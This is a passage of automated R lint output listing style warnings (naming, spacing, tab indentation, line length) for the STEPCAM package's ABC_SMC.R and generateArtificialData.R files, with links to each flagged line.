^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:40:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L226) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:227:13:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:231:13:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L231) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:231:14:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L231) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:231:34:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L231) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:237:21:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L237) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:237:22:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L237) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:239:13:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L239) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:239:38:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L239) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:257:54:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L257) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:260:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L260) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:9:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:32:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L261) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:264:27:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L264) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:264:27:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:266:20:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L266) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:267:20:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L267) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:274:61:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L274) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:278:63:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:281:15:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L281) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:282:44:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/ABC_SMC.R#L282) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                     